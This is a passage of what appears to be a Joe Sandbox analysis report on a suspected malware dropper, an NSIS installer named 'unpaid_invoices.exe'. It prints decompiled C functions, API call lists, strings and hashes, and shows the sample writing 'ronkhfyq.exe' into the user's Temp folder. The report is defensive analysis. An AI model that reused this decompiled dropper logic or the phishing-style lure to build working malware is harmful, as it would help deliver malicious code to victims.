              				} else {
              					_t73 =  *_t22(); // executed
              					E004065B5(L"1033", _t73 & 0x0000ffff);
              				}
              				E00403FF3(_t78, _t90);
              				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
              				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
              				 *0x7a8b3c = 0x10000;
              				if(E00406045(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
              					L16:
              					if(E00406045(_t98, _t86) == 0) {
              						E004066AB(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
              					}
              					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040); // executed
              					 *0x7a7a88 = _t30;
              					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
              						L21:
              						if(E0040140B(0) == 0) {
              							_t32 = E00403FF3(_t78, __eflags);
              							__eflags =  *0x7a8b40;
              							if( *0x7a8b40 != 0) {
              								_t33 = E004057A3(_t32, 0);
              								__eflags = _t33;
              								if(_t33 == 0) {
              									E0040140B(1);
              									goto L33;
              								}
              								__eflags =  *0x7a7a6c;
              								if( *0x7a7a6c == 0) {
              									E0040140B(2);
              								}
              								goto L22;
              							}
              							ShowWindow( *0x7a1f68, 5); // executed
              							_t39 = E004069CB("RichEd20"); // executed
              							__eflags = _t39;
              							if(_t39 == 0) {
              								E004069CB("RichEd32");
              							}
              							_t87 = L"RichEdit20W";
              							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
              							__eflags = _t40;
              							if(_t40 == 0) {
              								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
              								 *0x7a7a64 = _t87;
              								RegisterClassW(0x7a7a40);
              							}
              							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
              							E00403C6D(E0040140B(5), 1);
              							return _t44;
              						}
              						L22:
              						_t36 = 2;
              						return _t36;
              					} else {
              						_t78 =  *0x7a8aa0;
              						 *0x7a7a44 = E00401000;
              						 *0x7a7a50 =  *0x7a8aa0;
              						 *0x7a7a54 = _t30;
              						 *0x7a7a64 = 0x40a3b4;
              						if(RegisterClassW(0x7a7a40) == 0) {
              							L33:
              							__eflags = 0;
              							return 0;
              						}
              						SystemParametersInfoW(0x30, 0,  &_v16, 0);
              						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
              						goto L21;
              					}
              				} else {
              					_t78 =  *(_t82 + 0x48);
              					_t92 = _t78;
              					if(_t78 == 0) {
              						goto L16;
              					}
              					_t76 = 0x7a6a40;
              					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
              					_t63 =  *0x7a6a40; // 0x43
              					if(_t63 == 0) {
              						goto L16;
              					}
              					if(_t63 == 0x22) {
              						_t76 = 0x7a6a42;
              						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
              					}
              					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
              					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
              						L15:
              						E0040666E(_t86, E00405F3D(_t76));
              						goto L16;
              					} else {
              						_t69 = GetFileAttributesW(_t76);
              						if(_t69 == 0xffffffff) {
              							L14:
              							E00405F89(_t76);
              							goto L15;
              						}
              						_t98 = _t69 & 0x00000010;
              						if((_t69 & 0x00000010) != 0) {
              							goto L15;
              						}
              						goto L14;
              					}
              				}
              			}


























              APIs
                • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
              • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D37
                • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
              • lstrcatW.KERNEL32(1033,007A1F88), ref: 00403D9E
              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,?,?,?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,76CDFAA0), ref: 00403E1E
              • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,?,?,?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,?,00000000,?), ref: 00403E3C
              • LoadImageW.USER32 ref: 00403E85
              • RegisterClassW.USER32 ref: 00403EC2
              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403EDA
              • CreateWindowExW.USER32 ref: 00403F0F
              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F45
              • GetClassInfoW.USER32 ref: 00403F71
              • GetClassInfoW.USER32 ref: 00403F7E
              • RegisterClassW.USER32 ref: 00403F87
              • DialogBoxParamW.USER32 ref: 00403FA6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
              • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
              • API String ID: 606308-2796827352
              • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
              • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
              • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
              • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 321 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 324 403120-403125 321->324 325 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 321->325 326 403370-403374 324->326 333 403246-403254 call 40302e 325->333 334 40315e-403175 325->334 340 403328-40332d 333->340 341 40325a-40325d 333->341 336 403177 334->336 337 403179-403186 call 4035e8 334->337 336->337 345 4032e4-4032ec call 40302e 337->345 346 40318c-403192 337->346 340->326 343 403289-4032d8 GlobalAlloc call 40618d CreateFileW 341->343 344 40325f-403277 call 4035fe call 4035e8 341->344 362 4032da-4032df 343->362 363 4032ee-40331e call 4035fe call 403377 343->363 344->340 373 40327d-403283 344->373 345->340 350 403212-403216 346->350 351 403194-4031ac call 406119 346->351 354 403218-40321e call 40302e 350->354 355 40321f-403225 350->355 351->355 365 4031ae-4031b5 351->365 354->355 360 403227-403235 call 406b28 355->360 361 403238-403240 355->361 360->361 361->333 361->334 362->326 377 403323-403326 363->377 365->355 371 4031b7-4031be 365->371 371->355 374 4031c0-4031c7 371->374 373->340 373->343 374->355 376 4031c9-4031d0 374->376 376->355 378 4031d2-4031f2 376->378 377->340 379 40332f-403340 377->379 378->340 380 4031f8-4031fc 378->380 381 403342 379->381 382 403348-40334d 379->382 383 403204-40320c 380->383 384 4031fe-403202 380->384 381->382 385 40334e-403354 382->385 383->355 386 40320e-403210 383->386 384->333 384->383 385->385 387 403356-40336e call 406119 385->387 386->355 387->326
              C-Code - Quality: 97%
              			E004030D0(void* __eflags, signed int _a4) {
              				long _v8;
              				long _v12;
              				intOrPtr _v16;
              				long _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				signed int _v40;
              				short _v560;
              				long _t54;
              				void* _t57;
              				void* _t61;
              				intOrPtr _t64;
              				void* _t67;
              				intOrPtr* _t69;
              				long _t81;
              				signed int _t88;
              				intOrPtr _t91;
              				void* _t94;
              				void* _t99;
              				void* _t103;
              				long _t104;
              				long _t107;
              				void* _t108;
              
              				_v8 = 0;
              				_v12 = 0;
              				 *0x7a8aac = GetTickCount() + 0x3e8;
              				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe", 0x400);
              				_t103 = E0040615E(L"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe", 0x80000000, 3);
              				 *0x40a018 = _t103;
              				if(_t103 == 0xffffffff) {
              					return L"Error launching installer";
              				}
              				E0040666E(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe");
              				E0040666E(0x7b7000, E00405F89(L"C:\\Users\\jones\\Desktop"));
              				_t54 = GetFileSize(_t103, 0);
              				 *0x79f740 = _t54;
              				_t107 = _t54;
              				if(_t54 <= 0) {
              					L22:
              					E0040302E(1);
              					_pop(_t94);
              					if( *0x7a8ab4 == 0) {
              						goto L30;
              					}
              					if(_v12 == 0) {
              						L26:
              						_t57 = GlobalAlloc(0x40, _v20); // executed
              						_t108 = _t57;
              						 *0x40ce78 = 0xb;
              						 *0x40ce90 = 0; // executed
              						E0040618D(_t94,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
              						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
              						 *0x40a01c = _t61;
              						if(_t61 != 0xffffffff) {
              							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
              							 *0x79f744 = _t64;
              							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
              							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
              							if(_t67 == _v20) {
              								 *0x7a8ab0 = _t108;
              								 *0x7a8ab8 =  *_t108;
              								if((_v40 & 0x00000001) != 0) {
              									 *0x7a8abc =  *0x7a8abc + 1;
              								}
              								_t45 = _t108 + 0x44; // 0x44
              								_t69 = _t45;
              								_t99 = 8;
              								do {
              									_t69 = _t69 - 8;
              									 *_t69 =  *_t69 + _t108;
              									_t99 = _t99 - 1;
              								} while (_t99 != 0);
              								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
              								E00406119(0x7a8ac0, _t108 + 4, 0x40);
              								return 0;
              							}
              							goto L30;
              						}
              						return L"Error writing temporary file. Make sure your temp folder is valid.";
              					}
              					E004035FE( *0x79f730);
              					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
              						goto L30;
              					} else {
              						goto L26;
              					}
              				} else {
              					do {
              						_t104 = _t107;
              						asm("sbb eax, eax");
              						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
              						if(_t107 >= _t81) {
              							_t104 = _t81;
              						}
              						if(E004035E8(0x797730, _t104) == 0) {
              							E0040302E(1);
              							L30:
              							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
              						}
              						if( *0x7a8ab4 != 0) {
              							if((_a4 & 0x00000002) == 0) {
              								E0040302E(0);
              							}
              							goto L19;
              						}
              						E00406119( &_v40, 0x797730, 0x1c);
              						_t88 = _v40;
              						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
              							_a4 = _a4 | _t88;
              							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
              							_t91 = _v16;
              							 *0x7a8ab4 =  *0x79f730;
              							if(_t91 > _t107) {
              								goto L30;
              							}
              							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
              								_v12 = _v12 + 1;
              								_t107 = _t91 - 4;
              								if(_t104 > _t107) {
              									_t104 = _t107;
              								}
              								goto L19;
              							} else {
              								goto L22;
              							}
              						}
              						L19:
              						if(_t107 <  *0x79f740) {
              							_v8 = E00406B28(_v8, 0x797730, _t104);
              						}
              						 *0x79f730 =  *0x79f730 + _t104;
              						_t107 = _t107 - _t104;
              					} while (_t107 != 0);
              					goto L22;
              				}
              			}

              APIs
              • GetTickCount.KERNEL32 ref: 004030E4
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\unpaid_invoices.exe,00000400), ref: 00403100
                • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00406162
                • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\unpaid_invoices.exe,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00403149
              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\unpaid_invoices.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
              • API String ID: 2803837635-353167155
              • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
              • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
              • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
              • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 454 40176f-401794 call 402da6 call 405fb4 459 401796-40179c call 40666e 454->459 460 40179e-4017b0 call 40666e call 405f3d lstrcatW 454->460 466 4017b5-4017b6 call 4068f5 459->466 460->466 469 4017bb-4017bf 466->469 470 4017c1-4017cb call 4069a4 469->470 471 4017f2-4017f5 469->471 478 4017dd-4017ef 470->478 479 4017cd-4017db CompareFileTime 470->479 473 4017f7-4017f8 call 406139 471->473 474 4017fd-401819 call 40615e 471->474 473->474 481 40181b-40181e 474->481 482 40188d-4018b6 call 4056d0 call 403377 474->482 478->471 479->478 483 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 481->483 484 40186f-401879 call 4056d0 481->484 496 4018b8-4018bc 482->496 497 4018be-4018ca SetFileTime 482->497 483->469 517 401864-401865 483->517 494 401882-401888 484->494 498 402c33 494->498 496->497 500 4018d0-4018db FindCloseChangeNotification 496->500 497->500 502 402c35-402c39 498->502 503 4018e1-4018e4 500->503 504 402c2a-402c2d 500->504 506 4018e6-4018f7 call 4066ab lstrcatW 503->506 507 4018f9-4018fc call 4066ab 503->507 504->498 511 401901-4023a2 call 405cce 506->511 507->511 511->502 511->504 517->494 519 401867-401868 517->519 519->484
              C-Code - Quality: 77%
              			E0040176F(FILETIME* __ebx, void* __eflags) {
              				void* __esi;
              				void* _t35;
              				void* _t43;
              				void* _t45;
              				FILETIME* _t51;
              				FILETIME* _t64;
              				void* _t66;
              				signed int _t72;
              				FILETIME* _t73;
              				FILETIME* _t77;
              				signed int _t79;
              				WCHAR* _t81;
              				void* _t83;
              				void* _t84;
              				void* _t86;
              
              				_t77 = __ebx;
              				 *(_t86 - 8) = E00402DA6(0x31);
              				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
              				_t35 = E00405FB4( *(_t86 - 8));
              				_push( *(_t86 - 8));
              				_t81 = L"C:\\U";
              				if(_t35 == 0) {
              					lstrcatW(E00405F3D(E0040666E(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
              				} else {
              					E0040666E();
              				}
              				E004068F5(_t81);
              				while(1) {
              					__eflags =  *(_t86 + 8) - 3;
              					if( *(_t86 + 8) >= 3) {
              						_t66 = E004069A4(_t81);
              						_t79 = 0;
              						__eflags = _t66 - _t77;
              						if(_t66 != _t77) {
              							_t73 = _t66 + 0x14;
              							__eflags = _t73;
              							_t79 = CompareFileTime(_t73, _t86 - 0x24);
              						}
              						asm("sbb eax, eax");
              						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
              						__eflags = _t72;
              						 *(_t86 + 8) = _t72;
              					}
              					__eflags =  *(_t86 + 8) - _t77;
              					if( *(_t86 + 8) == _t77) {
              						E00406139(_t81);
              					}
              					__eflags =  *(_t86 + 8) - 1;
              					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
              					__eflags = _t43 - 0xffffffff;
              					 *(_t86 - 0x38) = _t43;
              					if(_t43 != 0xffffffff) {
              						break;
              					}
              					__eflags =  *(_t86 + 8) - _t77;
              					if( *(_t86 + 8) != _t77) {
              						E004056D0(0xffffffe2,  *(_t86 - 8));
              						__eflags =  *(_t86 + 8) - 2;
              						if(__eflags == 0) {
              							 *((intOrPtr*)(_t86 - 4)) = 1;
              						}
              						L31:
              						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
              						__eflags =  *0x7a8b28;
              						goto L32;
              					} else {
              						E0040666E(0x40b5f8, _t83);
              						E0040666E(_t83, _t81);
              						E004066AB(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
              						E0040666E(_t83, 0x40b5f8);
              						_t64 = E00405CCE("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
              						__eflags = _t64;
              						if(_t64 == 0) {
              							continue;
              						} else {
              							__eflags = _t64 == 1;
              							if(_t64 == 1) {
              								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
              								L32:
              								_t51 = 0;
              								__eflags = 0;
              							} else {
              								_push(_t81);
              								_push(0xfffffffa);
              								E004056D0();
              								L29:
              								_t51 = 0x7fffffff;
              							}
              						}
              					}
              					L33:
              					return _t51;
              				}
              				E004056D0(0xffffffea,  *(_t86 - 8));
              				 *0x7a8b54 =  *0x7a8b54 + 1;
              				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
              				 *0x7a8b54 =  *0x7a8b54 - 1;
              				__eflags =  *(_t86 - 0x24) - 0xffffffff;
              				_t84 = _t45;
              				if( *(_t86 - 0x24) != 0xffffffff) {
              					L22:
              					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
              				} else {
              					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
              					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
              						goto L22;
              					}
              				}
              				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
              				__eflags = _t84 - _t77;
              				if(_t84 >= _t77) {
              					goto L31;
              				} else {
              					__eflags = _t84 - 0xfffffffe;
              					if(_t84 != 0xfffffffe) {
              						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
              					} else {
              						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
              						lstrcatW(_t81,  *(_t86 - 8));
              					}
              					_push(0x200010);
              					_push(_t81);
              					E00405CCE();
              					goto L29;
              				}
              				goto L33;
              			}

              APIs
              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
              • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,00000000,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
              • API String ID: 1941528284-2522903133
              • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
              • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
              • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
              • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 520 40347f-4034a7 GetTickCount 521 4035d7-4035df call 40302e 520->521 522 4034ad-4034d8 call 4035fe SetFilePointer 520->522 527 4035e1-4035e5 521->527 528 4034dd-4034ef 522->528 529 4034f1 528->529 530 4034f3-403501 call 4035e8 528->530 529->530 533 403507-403513 530->533 534 4035c9-4035cc 530->534 535 403519-40351f 533->535 534->527 536 403521-403527 535->536 537 40354a-403566 call 406b96 535->537 536->537 538 403529-403549 call 40302e 536->538 543 4035d2 537->543 544 403568-403570 537->544 538->537 545 4035d4-4035d5 543->545 546 403572-40357a call 406210 544->546 547 403593-403599 544->547 545->527 551 40357f-403581 546->551 547->543 548 40359b-40359d 547->548 548->543 550 40359f-4035b2 548->550 550->528 552 4035b8-4035c7 SetFilePointer 550->552 553 403583-40358f 551->553 554 4035ce-4035d0 551->554 552->521 553->535 555 403591 553->555 554->545 555->550
              C-Code - Quality: 93%
              			E0040347F(intOrPtr _a4) {
              				intOrPtr _t11;
              				signed int _t12;
              				void* _t15;
              				long _t16;
              				void* _t18;
              				intOrPtr _t30;
              				intOrPtr _t33;
              				intOrPtr _t35;
              				void* _t36;
              				intOrPtr _t48;
              
              				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
              				 *0x7a8aac = GetTickCount() + 0x1f4;
              				if(_t33 <= 0) {
              					L22:
              					E0040302E(1);
              					return 0;
              				}
              				E004035FE( *0x79f744);
              				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
              				 *0x79f740 = _t33;
              				 *0x79f730 = 0;
              				while(1) {
              					_t30 = 0x4000;
              					_t11 =  *0x79f738 -  *0x79f744;
              					if(_t11 <= 0x4000) {
              						_t30 = _t11;
              					}
              					_t12 = E004035E8(0x793730, _t30);
              					if(_t12 == 0) {
              						break;
              					}
              					 *0x79f744 =  *0x79f744 + _t30;
              					 *0x40ce68 = 0x793730;
              					 *0x40ce6c = _t30;
              					L6:
              					L6:
              					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
              						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
              						E0040302E(0);
              					}
              					 *0x40ce70 = 0x78b730;
              					 *0x40ce74 = 0x8000;
              					if(E00406B96(?str?) < 0) {
              						goto L20;
              					}
              					_t35 =  *0x40ce70; // 0x78e665
              					_t36 = _t35 - 0x78b730;
              					if(_t36 == 0) {
              						__eflags =  *0x40ce6c; // 0x0
              						if(__eflags != 0) {
              							goto L20;
              						}
              						__eflags = _t30;
              						if(_t30 == 0) {
              							goto L20;
              						}
              						L16:
              						_t16 =  *0x79f734;
              						if(_t16 -  *0x40ce60 + _a4 > 0) {
              							continue;
              						}
              						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
              						goto L22;
              					}
              					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
              					if(_t18 == 0) {
              						_push(0xfffffffe);
              						L21:
              						_pop(_t15);
              						return _t15;
              					}
              					 *0x40ce60 =  *0x40ce60 + _t36;
              					_t48 =  *0x40ce6c; // 0x0
              					if(_t48 != 0) {
              						goto L6;
              					}
              					goto L16;
              					L20:
              					_push(0xfffffffd);
              					goto L21;
              				}
              				return _t12 | 0xffffffff;
              			}

              APIs
              • GetTickCount.KERNEL32 ref: 00403493
                • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
              • SetFilePointer.KERNELBASE(?,00000000,00000000,/ky,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FilePointer$CountTick
              • String ID: /ky$07y$ex
              • API String ID: 1092082344-1542368883
              • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
              • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
              • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
              • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 556 4069cb-4069eb GetSystemDirectoryW 557 4069ed 556->557 558 4069ef-4069f1 556->558 557->558 559 406a02-406a04 558->559 560 4069f3-4069fc 558->560 562 406a05-406a38 wsprintfW LoadLibraryExW 559->562 560->559 561 4069fe-406a00 560->561 561->562
              C-Code - Quality: 100%
              			E004069CB(intOrPtr _a4) {
              				short _v576;
              				signed int _t13;
              				struct HINSTANCE__* _t17;
              				signed int _t19;
              				void* _t24;
              
              				_t13 = GetSystemDirectoryW( &_v576, 0x104);
              				if(_t13 > 0x104) {
              					_t13 = 0;
              				}
              				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
              					_t19 = 1;
              				} else {
              					_t19 = 0;
              				}
              				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
              				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
              				return _t17;
              			}

              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
              • wsprintfW.USER32 ref: 00406A1D
              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%S.dll$UXTHEME$\
              • API String ID: 2200240437-1946221925
              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
